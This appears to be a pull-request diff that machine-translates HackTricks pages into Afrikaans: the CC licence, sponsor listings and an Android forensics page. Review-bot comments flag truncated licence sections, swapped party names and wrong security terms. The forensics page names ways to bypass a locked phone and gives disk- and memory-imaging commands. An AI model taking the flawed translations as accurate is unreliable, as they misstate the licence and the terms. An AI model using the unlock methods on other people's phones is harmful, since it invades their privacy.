by the Licensor (including by pseudonym if designated); +2. U kan aan die voorwaardes in Artikel 3(a)(1) voldoen op enige redelike wyse gebaseer op die medium, middels, en konteks waarin U die Gelisensieerde Materiaal deel. Byvoorbeeld, dit mag redelik wees om aan die voorwaardes te voldoen deur 'n URI of skakel na 'n hulpbron te voorsien wat die vereiste inligting insluit. - ii. a copyright notice; +3. Indien versoek deur die Lisensiehouer, moet U enige van die inligting wat vereis word deur Artikel 3(a)(1)(A) verwyder, vir sover dit redelik uitvoerbaar is. - iii. a notice that refers to this Public License; +4. As U Aangepaste Materiaal wat U produseer deel, mag die Lisensie van die Aanpasser wat U toepas, nie ontvangers van die Aangepaste Materiaal verhoed om aan hierdie Openbare Lisensie te voldoen nie. - iv. 
a notice that refers to the disclaimer of warranties; +## Artikel 4 - Sui Generis Databasisregte. - v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable; +Waar die Gelisensieerde Regte Sui Generis Databasisregte insluit wat van toepassing is op U gebruik van die Gelisensieerde Materiaal: - B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and +a. vir die vermyding van twyfel, verleen Artikel 2(a)(1) U die reg om al of 'n aansienlike gedeelte van die inhoud van die databasis te onttrek, hergebruik, verveelvoudig, en te deel vir nie-kommersiële doeleindes slegs; - C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License. +b. as U al of 'n aansienlike gedeelte van die inhoud van die databasis insluit in 'n databasis waarin U Sui Generis Databasisregte het, dan is die databasis waarin U Sui Generis Databasisregte het (maar nie sy individuele inhoud nie) Aangepaste Materiaal; en - 2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information. +c. U moet voldoen aan die voorwaardes in Artikel 3(a) as U al of 'n aansienlike gedeelte van die inhoud van die databasis deel. - 3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable. +Vir die vermyding van twyfel, vul +## Artikel 7 - Ander Voorwaardes en Bepalings. - 4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License. +a. 
Die Lisensiehouer sal nie gebonde wees aan enige bykomende of verskillende terme of voorwaardes wat deur U gekommunikeer word tensy uitdruklik ooreengekom. -## Section 4 – Sui Generis Database Rights. +b. Enige reëlings, verstandhoudings of ooreenkomste met betrekking tot die Gelisensieerde Materiaal wat nie hierin vermeld word nie, is afsonderlik van en onafhanklik van die terme en voorwaardes van hierdie Openbare Lisensie. -Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: +## Artikel 8 - Interpretasie. -a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only; +a. Ten einde twyfel te voorkom, verminder hierdie Openbare Lisensie nie, en mag nie geïnterpreteer word om, die gebruik van die Gelisensieerde Materiaal te beperk, beperk, beperk of voorwaardes op te lê wat wettiglik sonder toestemming onder hierdie Openbare Lisensie gemaak kan word nie. -b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and +b. Vir sover moontlik, as enige bepaling van hierdie Openbare Lisensie as onafdwingbaar beskou word, sal dit outomaties hervorm word tot die minimum mate wat nodig is om dit afdwingbaar te maak. As die bepaling nie hervorm kan word nie, sal dit van hierdie Openbare Lisensie afgesny word sonder om die afdwingbaarheid van die oorblywende terme en voorwaardes te beïnvloed. -c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database. 
- -For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. - -## Section 5 – Disclaimer of Warranties and Limitation of Liability. - -a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ - -b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__ - -c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. - -## Section 6 – Term and Termination. - -a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. - -b. 
Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates: - - 1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or - - 2. upon express reinstatement by the Licensor. - - For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License. - -c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License. - -d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License. - -## Section 7 – Other Terms and Conditions. - -a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. - -b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License. - -## Section 8 – Interpretation. - -a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. - -b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions. - -c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor. - -d. 
Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority. +c. Geen term of voorwaarde van hierdie Openbare Lisensie sal afgesien word nie en geen versuim om te voldoen sal toegestem word tensy uitdruklik ooreengekom deur die Lisensiehouer. +d. Niks in hierdie Openbare Lisensie stel 'n beperking op, of afstand van, enige voorregte en immuniteite wat van toepassing is op die Lisensiehouer of U nie, insluitend van die regsprosesse van enige jurisdiksie of gesag. ``` -Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. +Creative Commons is not a party to its public licenses. 
Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
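Review bot: The translated LICENSE.md drops two whole sections of the licence: on the `+` side the text jumps from the Section 4 database-rights clauses straight to `+## Artikel 7 - Ander Voorwaardes en Bepalings.`, while the `-` side removes `## Section 5 – Disclaimer of Warranties and Limitation of Liability.` and `## Section 6 – Term and Termination.` with nothing replacing them, and the closing sentence of Section 4 is cut off mid-sentence at `+Vir die vermyding van twyfel, vul`. The Afrikaans file therefore no longer carries the warranty disclaimer, the limitation of liability or the termination and reinstatement terms, which are exactly the clauses a licensor most needs intact. Two wording problems compound this: `Lisensiehouer` (licence holder, i.e. the licensee) is used throughout for "Licensor" (e.g. `+a. Die Lisensiehouer sal nie gebonde wees ...` replacing `-a. The Licensor shall not be bound ...`), which swaps the two parties, and Artikel 8(a) collapses "reduce, limit, restrict" into `te beperk, beperk, beperk`. Suggest excluding LICENSE.md from the translation workflow and keeping the canonical English CC BY-NC 4.0 text: the trailing Creative Commons paragraph, which this hunk itself leaves in English, states that CC does not authorize use of its marks in connection with unauthorized modifications to its public licenses, and a machine-translated, truncated copy is hard to read as anything else. If an Afrikaans rendering is wanted, link it as an unofficial translation next to the English original rather than replacing it.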
- - diff --git a/README.md b/README.md index 604662621..c75d76e4b 100644 --- a/README.md +++ b/README.md @@ -2,39 +2,39 @@
-_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ {% hint style="success" %} -**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** +**Welkom by die wiki waar jy elke haktruk/tegniek/wat ek geleer het van CTF's, werklike toepassings, navorsing en nuus sal vind.** {% endhint %} -To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** +Om te begin, volg hierdie bladsy waar jy die **tipiese vloei** sal vind wat **jy moet volg wanneer jy een of meer masjiene pentest:** {% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %} [pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md) {% endcontent-ref %} -## Platinum Sponsors +## Platinum Borge -_Your company could be here._ +_Jou maatskappy kan hier wees._ -## Corporate Sponsors +## Korporatiewe Borge ### [STM Cyber](https://www.stmcyber.com)
-[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. +[**STM Cyber**](https://www.stmcyber.com) is 'n uitstekende sibersekuriteitsmaatskappy met die leuse **HACK THE UNHACKABLE**. Hulle doen hul eie navorsing en ontwikkel hul eie hakwerkstukke om **verskeie waardevolle sibersekuriteitsdienste** soos pentesting, Rooi spanne en opleiding aan te bied. -You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com) +Jy kan hul **blog** besoek by [**https://blog.stmcyber.com**](https://blog.stmcyber.com) -**STM Cyber** also support cybersecurity open source projects like HackTricks :) +**STM Cyber** ondersteun ook sibersekuriteit oopbronprojekte soos HackTricks :) ### [RootedCON](https://www.rootedcon.com/)
-[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com) is die belangrikste sibersekuriteitsgeleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} @@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
-**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** +**Intigriti** is die **#1** etiese hak- en **foutbeloningsplatform in Europa.** -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Foutbeloningswenk**: **teken aan** vir **Intigriti**, 'n premium **foutbeloningsplatform wat deur hakkers, vir hakkers** geskep is! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin belonings verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -53,9 +53,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools. +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome outomaties** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapswerkstukke. -Get Access Today: +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} @@ -63,13 +63,13 @@ Get Access Today:
-Stay a step ahead in the cybersecurity game. +Bly 'n tree voor in die sibersekuriteitspel. -[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most. +[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) maak foutbestuur maklik. Hou jou aanvalsoppervlak dop, sien waar jou maatskappy kwesbaar is, en prioritiseer kwessies wat jou stelsels die meeste blootstel sodat jy kan fokus op wat die belangrikste is. -Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster. +Voer duisende kontroles uit met 'n enkele platform wat jou hele tegniese stapel van interne infrastruktuur tot webtoepassings, API's en wolkstelsels dek. Integreer naadloos met [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) en stroomlyn DevOps sodat jou span vinniger herstelwerk kan implementeer. -Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). +Intruder rus nooit nie. Rondom-die-klok beskerming monitor jou stelsels 24/7. Wil jy meer weet? Besoek hul webwerf en probeer dit uit met [**'n gratis toetslopie**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} 
@@ -77,26 +77,26 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hakkers en foutbeloningsjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hakinsigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hak insluit -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Realtydse Haknuus**\ +Bly op hoogte van die vinnige hakwêreld deur realtydse nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hakkers! *** -### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit +### [Pentest-Tools.com](https://pentest-tools.com/) - Die noodsaaklike penetrasietoetsingstoolkit
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognosering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporing- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, dop te maak en pret te hê. {% embed url="https://pentest-tools.com/" %} @@ -104,19 +104,18 @@ Stay informed with the newest bug bounties launching and crucial platform update
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. +[**WebSec**](https://websec.nl) is 'n professionele sibersekuriteitsmaatskappy wat in **Amsterdam** gebaseer is en help om besighede **regoor die wêreld** teen die nuutste sibersekuriteitsdreigings te beskerm deur **offensiewe-sibersekuriteitsdienste** met 'n **moderne** benadering te bied. -WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. +WebSec is 'n **alles-in-een sibersekuriteitsmaatskappy**, wat beteken dat hulle alles doen; Pentesting, **Sekerheids** Ouditse, Bewustheidsopleiding, Phishing-kampanjes, Kode-oorsig, Uitbuitingsontwikkeling, Uitbesteding van Sekuriteitskundiges en nog baie meer. -Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)! +'n Ander koel ding oor WebSec is dat hulle, in teenstelling met die bedryfsgemiddelde, **baie selfversekerd is in hul vaardighede**, tot so 'n mate dat hulle die beste kwaliteit resultate waarborg, dit staan op hul webwerf "**As ons dit nie kan hak nie, betaal jy nie daarvoor nie!**". Vir meer inligting kyk na hul [**webwerf**](https://websec.nl/en/) en [**blog**](https://websec.nl/blog/)! 
-In addition to the above WebSec is also a **committed supporter of HackTricks.** +Bo en behalwe die bogenoemde is WebSec ook 'n **toegewyde ondersteuner van HackTricks.** {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} +## Lisensie & Vrywaring -## License & Disclaimer - -**Check them in:** +**Kyk na hulle in:** {% content-ref url="welcome/hacktricks-values-and-faq.md" %} [hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md) @@ -124,14 +123,14 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
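Review bot: Security terms are translated literally and inconsistently across these README hunks, so the Afrikaans page says something different from the English in several places: in the `@@ -63,13 +63,13 @@` hunk "vulnerability management" becomes `foutbestuur` (error management) two lines before the same hunk renders "vulnerable" as `kwesbaar`; in the `@@ -104,19 +104,18 @@` hunk "pop shells" becomes `dop te maak`, where `dop` is an eggshell or a drink, not a command shell; "hacking tools" becomes `hakwerkstukke` (work assignments) in the STM Cyber paragraph; "Red teams" becomes `Rooi spanne`; "Real-Time" becomes `Realtydse` where `intydse` is the usual term; and "Security Audits" becomes `Sekerheids Ouditse`, a typo for `Oudits`. Suggest a fixed glossary for the workflow (e.g. `kwesbaarheidsbestuur`, and keep `shell`, `pentesting`, `red team` and `bug bounty` as loanwords the way the page already keeps `pentest`) plus a human pass before merge. Two smaller points: in the `@@ -104,19 +104,18 @@` hunk the heading is re-emitted as `+## Lisensie & Vrywaring` directly after the `{% embed %}` line and one of the blank lines that framed it is dropped (the hunk shrinks from 19 to 18 lines), so the workflow should translate heading text in place and leave surrounding blank lines alone; and the support banner in `@@ -124,14 +124,14 @@` is translated differently from the identical banner in LICENSE.md and android-forensics.md (`github-opslagplekke` / `hacktruuks` here, `github-opslag` / `hacking-truuks` in LICENSE.md, `GitHub-opslagplekke` / `hacking-truuks` in the forensics file). The banner is the same English text in every file, so translate it once and reuse that string instead of letting the model re-translate it per file.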
diff --git a/android-forensics.md b/android-forensics.md index 154e7909b..ae5b648ba 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,51 @@ -# Android Forensics +# Android Forensika
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Locked Device +## Geslote Toestel -To start extracting data from an Android device it has to be unlocked. If it's locked you can: +Om data uit 'n Android-toestel te onttrek, moet dit oopgemaak word. As dit gesluit is, kan jy: -* Check if the device has debugging via USB activated. -* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) -* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) +* Kyk of die toestel USB-afdeling aktief het. +* Kyk vir 'n moontlike [smudge-aanval](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) +* Probeer met [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) -## Data Adquisition +## Data Verkryging -Create an [android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` +Skep 'n [Android-back-up met adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) en onttrek dit met behulp van [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### If root access or physical connection to JTAG interface +### As daar worteltoegang of fisiese verbinding met JTAG-interface is -* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory). -* `df /data` (Discover the block size of the system). -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size). +* `cat /proc/partitions` (soek die pad na die flitsgeheue, gewoonlik is die eerste inskrywing _mmcblk0_ en stem ooreen met die hele flitsgeheue). +* `df /data` (Ontdek die blokgrootte van die stelsel). 
+* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (voer dit uit met die inligting wat ingesamel is van die blokgrootte). -### Memory +### Geheue -Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb. +Gebruik Linux Memory Extractor (LiME) om die RAM-inligting te onttrek. Dit is 'n kernel-uitbreiding wat gelaai moet word via adb.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
